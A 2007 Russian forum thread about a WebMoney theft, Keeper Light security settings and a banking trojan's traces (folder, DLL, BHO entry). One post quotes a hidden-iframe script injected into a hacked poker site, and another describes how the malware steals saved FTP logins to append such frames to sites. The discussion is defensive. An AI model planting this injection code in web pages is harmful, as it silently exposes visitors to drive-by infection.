[vano]

Лайт-кипер - один из самых надежных типов вебманевских киперов (мне он представляется гораздо более надежным, чем полнофункциональный кипер)

Bull. Скажи пожалуйста были ли выполнены следующие мероприятия, гарантирующие безопасность при пользовании лайтом?

1. Был ли установлен на вебманевском сайте фильтр на ip-адреса?
2. Сертификат лайта устанавливался в "неэкспортируемом" варианте?

Если все это было сделано, и воровство произошло при выключенном компе, то вирус должен был работать только по следующей схеме.

1. Сертификат был украден изначально, в самый начальный момент установки его в систему. (После того, как он установлен в неэкспортируемом варианте, украсть его невозможно, хоть под суперадмином)

2. Вирус украл учетные данные электронной почты и используя их вор потом снял ip-фильтрацию.

Честно говоря, я не совсем уверен в наличии такого сложного вируса или комплекса вирусов... (скорее всего все-таки не были соблюдены все меры безопасности)

[vano]

Цитата:

Сообщение от bull писал вс, 09 декабря 2007 19:37

Другое дело, что wm-кипер (это даже хакеры доказали) - шпионская по сути своей программа. Она считывает такие данные о машине, цель знания которых очень трудно себе представить. И если вирус просто ворует сертификат, а потом "хозяин" лезет в кошелек с любой машины, то при наличии доброй воли владельцев ресурса, такую халяву можно было бы запросто пресечь. Но этого не делается, что наводит на грустные размышления. например, об имеющем место сговоре

Bull. Мне лично вся эта ситуация неприятна по следующей причине - вебманями пользуюсь уже около 5 лет, наблюдал как развивалась эта система. Ничего более удобного и полнофункционального в мире нет для онлайнбизнеса. Что касается "грустных размышлений". "Лайт" - специально сделан для того, чтобы имея сертификат можно было заходить с любого компа без установки программного обеспечения, просто из под браузера. И это реально очень удобно (удобнее чем программа wm-кипер) Плюс ещё можно за проксей работать.
Вебманевские механизмы гарантии сохранности ваших денег - самые надежные. Например на порядок надежнее, чем пользование визами и прочим пластиком в сети. То, что вебмани стали объектом хаккерских атак - это лишь следствие роста и развития этой системы до масштабов, интересных серьезным ворам.
Но когда предоставляются механизмы, гарантирующие безопасность, для того, чтобы они работали, надо этими механизмами пользоваться.

[Bull]

Цитата:

Сообщение от vano писал чт, 13 декабря 2007 06:35

Лайт-кипер - один из самых надежных типов вебманевских киперов (мне он представляется гораздо более надежным, чем полнофункциональный кипер)

Мне до последнего времени тоже так представлялось

Цитата:

Сообщение от Цитата:

Bull. Скажи пожалуйста были ли выполнены следующие мероприятия, гарантирующие безопасность при пользовании лайтом?

1. Был ли установлен на вебманевском сайте фильтр на ip-адреса?
2. Сертификат лайта устанавливался в "неэкспортируемом" варианте?

vano, дело в том, что во многих вопросах я абсолютный или относительный ламер и этого я не скрываю. Просто ВМ пользуюсь уже лет 7 и никогда у меня не воровали денег при всем моем ламерстве. теперь это случилось. И пути два: повысить безопасность. если есть нарушения с моей стороны, но он не гарантирует меня от краж, думаю, ты с этим согласишься или перестать пользоваться ВМ, хотя во всем остальном мне эта система до сих пор очень нравилась. Я на них бочку не гоню, просто поразмышлял немного.

Цитата:

Сообщение от Цитата:

Если все это было сделано, и воровство произошло при выключенном компе, то вирус должен был работать только по следующей схеме.

1. Сертификат был украден изначально, в самый начальный момент установки его в систему. (После того, как он установлен в неэкспортируемом варианте, украсть его невозможно, хоть под суперадмином)

2. Вирус украл учетные данные электронной почты и используя их вор потом снял ip-фильтрацию.

Честно говоря, я не совсем уверен в наличии такого сложного вируса или комплекса вирусов... (скорее всего все-таки не были соблюдены все меры безопасности)

тут ситуация какая. Как я уже писал, я воспользовался помощью Касперского на его форуме, провел все положенные процедуры, выслал все необходимые логи. Сейчас идет там переписка. нашлась подозрительная прога или часть проги. Думаю, в конце концов, какие-то ответы будут выявлены и я проинформирую.

Цитата:

Сообщение от Цитата:

Bull. Мне лично вся эта ситуация неприятна по следующей причине - вебманями пользуюсь уже около 5 лет, наблюдал как развивалась эта система. Ничего более удобного и полнофункционального в мире нет для онлайнбизнеса.

Выше свои собственные впечатления и опыт работы с ВМ я уже обрисовал. В принципе согласен, но эта крада что-то совсем смешала мои мысли по поводу ВМ

Цитата:

Сообщение от Цитата:

Что касается "грустных размышлений". "Лайт" - специально сделан для того, чтобы имея сертификат можно было заходить с любого компа без установки программного обеспечения, просто из под браузера. И это реально очень удобно (удобнее чем программа wm-кипер) Плюс ещё можно за проксей работать.
Вебманевские механизмы гарантии сохранности ваших денег - самые надежные. Например на порядок надежнее, чем пользование визами и прочим пластиком в сети. То, что вебмани стали объектом хаккерских атак - это лишь следствие роста и развития этой системы до масштабов, интересных серьезным ворам.
Но когда предоставляются механизмы, гарантирующие безопасность, для того, чтобы они работали, надо этими механизмами пользоваться.

Да вот, придется все это изучать и начинать пользоваться. Или не пользоваться ВМ. В общем, я жду пока результатов расследования Касперского. если с помощью моего компа удастся выявить хоть что-нибудь о природе этого вируса - многих проблем многим пользователям удастся избежать.

[kozmor]

Ну вот оказывается пользователь texas-holdem дает ссылки на троян!!! А вы говорите это бред! Булл, посмотри не заходил ли ты по его ссылкам?

[lappa]

Я слабо разбираюсь в скриптах, но компетентный ответ
[Зарегистрироваться?] 20&start=20
Вредоносный код есть.

[alexejv]

vano: по моему проблема лайт-кипера в том, что он не может работать с кошельком, который уже создан в "нормальном" кипере. Т.е. лично мне уже поздно переходить я считаю, у меня BL к 300 подбирается, жалко терять.
Или там есть механизмы объединения ?

[Bull]

В общем, результат обращения за помощью к Касперскому имеется.

1. По крайней мере на одном покерном сайте имеется вредоносный код. Этот сайт я посещал по ссылке. Откуда взял ссылку - не помню, но скорее всего с форума. Просто не буду больше ходить, потому что форумскими силами мы проблему не решим. нельзя же премодерировать ЛЮБОЙ постинг со ссылками до проверки его Касперским, это абсурд. так что лучше не ходить по неизвестным, даже если это покерный сайт.

2. С того сайта мой троян или нет - неизвестно, но это Trojan-Spy.Win32.banker.quo
Правда, не сказали, известная ли это уже штука ли нет.

3. По крайней мере, стало известно, что зараза создает папку C:\Program Files\Internet Connection Counter-Rus\, файл simcard1.dll в системной папке, где он не обнаруживается ни обычным поиском, ни визуально и код
O2 - BHO: Flash Module - {E7A4C0C8-2BFF-4241-9E8C-92E10245EC28} - simcard1.dll (file missing)

Вот пока что стало известно. Короче говоря, свой комп я благодаря всему этому практически излечил - сейчас еще раз AVZ продеру и все.
Так же жду ответа от кого-ниубдь из форумчан, как устранить дыры в своей безопасности, которые я указал по полученным логам и которые были отмечены Касперским

[Fireball]

Цитата:

Сообщение от k0zm0r писал вт, 11 декабря 2007 20:35

Мне летом пришел троян от журнала CGM в письме и ломанули акк в ЕП, я успел тогда заморозить счет... А ты говоришь бред.. Я хочу людей предупредить чтобы аккуратней были...не понял твоих эмоций.. :?

Спам в личную почту - это совсем другой способ, так как его легко и просто автоматизировать. Не вижу аналогии вообщем.

Цитата:

Сообщение от Профи писал ср, 12 декабря 2007 12:01

Комп нужно от троянов защищать: ВМ вместо пользователя не сможет это сделать.

Об этом я распинаюсь почти на каждой странице этой ветки, но всем пофигу

Цитата:

Сообщение от Профи писал ср, 12 декабря 2007 12:06

P.S. Напишу статью об этом.

Если будешь писать конкретно про безопасность WM, можешь мой самый большой пост взять из этой ветки, может тебя хоть послушают

Цитата:

Сообщение от alexejv писал чт, 13 декабря 2007 18:39

vano: по моему проблема лайт-кипера в том, что он не может работать с кошельком, который уже создан в "нормальном" кипере. Т.е. лично мне уже поздно переходить я считаю, у меня BL к 300 подбирается, жалко терять.
Или там есть механизмы объединения ?

Можно прикреплять несколько WM ID к одному аттестату, но BL все равно будет у каждого свой. Но через passport.webmoney.ru можно будет увидеть прикрепленные и их BL.
А зачем тебе BL нужен? На мой взгляд, это только для онлайн-магазинов каких-нить. Вообщем, чтобы повысить доверие незнакомых людей к тебе. А так он больше ничего не значит, а только выражает через какую-то формулу объем, количество переводов и количество респондентов, с которыми осуществляются переводы.

[alexejv]

Цитата:

Сообщение от Fireball писал чт, 13 декабря 2007 19:12

А зачем тебе BL нужен? На мой взгляд, это только для онлайн-магазинов каких-нить.

Ну дык а я кто?

[Grey]

Цитата:

Сообщение от bull писал

1. По крайней мере на одном покерном сайте имеется вредоносный код.

Имя в студию. Лучше русскими буквами, чтобы по ссылке нельзя было перейти.

[alexejv]

Цитата:

Сообщение от Grey писал чт, 13 декабря 2007 21:04

Цитата:

Имя в студию. Лучше русскими буквами, чтобы по ссылке нельзя было перейти.

на пит*********.ру - полагаю.
Вот код вируса: он переводит на другую страницу:

Цитата:

Сообщение от Цитата:

<SCRIPT>window.status='Done';document.write('<ifra me name=7f2006f src=\'[Зарегистрироваться?]'+Math.round(Math.random()*21945)+'5ea\' width=133 height=165 style=\'display: none\'></iframe>')</SCRIPT>

[Fireball]

Цитата:

Сообщение от alexejv писал чт, 13 декабря 2007 21:12

Вот код вируса: он переводит на другую страницу:

Цитата:

Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?

[Bull]

Цитата:

Сообщение от Fireball писал чт, 13 декабря 2007 23:08

Цитата:

Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?

Если бы он ругался, то вопроса не возникло бы.

[alexejv]

Цитата:

Сообщение от Fireball писал чт, 13 декабря 2007 23:08

Цитата:

Ну не переводит, а типа открывает страницу незаметно для пользователя Вполне возможно, что поломали сайт и запихали туда такой код. Странно, что до сих пор владелец ничего не заметил.
А антивирус ругается на что-нить?

похоже действительно без его ведома там вирус. Погуглил - такая напасть сейчас у сравнительно многих появилась в последние дни. Я подозреваю дырку в каком-нить сайтовом движке....

[Yura]

Цитата:

Сообщение от alexejv писал пт, 14 декабря 2007 00:13

похоже действительно без его ведома там вирус. Погуглил - такая напасть сейчас у сравнительно многих появилась в последние дни. Я подозреваю дырку в каком-нить сайтовом движке....

Да, у меня была аналогичная проблема, но вовремя предупредили, быстро убрал :(. Как я понял из описания, вирус сначала тырит логины и пароли к хостингу, запомненные в ФТП-программах, а потом дописывает в индексные файлы свои фреймы со ссылкой на заражённую страницу. Правда, мне ещё повезло - страница не была заражена, ибо это ещё и довольно безопасные кликеры юзают.

[Mercator]

Как можно узнать, заходил ли я на этот сайт?

[Bull]

Цитата:

Сообщение от Mercator писал пт, 14 декабря 2007 07:21

Как можно узнать, заходил ли я на этот сайт?

Лучше вообще не гадать, а воспользоваться вот этим:
[Зарегистрироваться?]

[Mercator]

Меня интересует в целом, как узнать, заходил ли я по некоему адресу. Т.е. я хочу ввести этот адрес в определённую программу и она мне ответит, заходил ли я на него. Существует такая прога?
P.S. Журнал браузера не предлагать, там далеко не всё.

[Tourist2007]

Короче надо специально человека нанимать, чтобы он следил за отсутствием вирусов на твоем компе.. :( Заколебало.

[Bull]

Цитата:

Сообщение от Mercator писал пт, 14 декабря 2007 08:23

Меня интересует в целом, как узнать, заходил ли я по некоему адресу. Т.е. я хочу ввести этот адрес в определённую программу и она мне ответит, заходил ли я на него. Существует такая прога?

Сомневаюсь.
И даже таковая ничего не найдет. если скажем вирус чистит все следы "захода", что совсем не трудно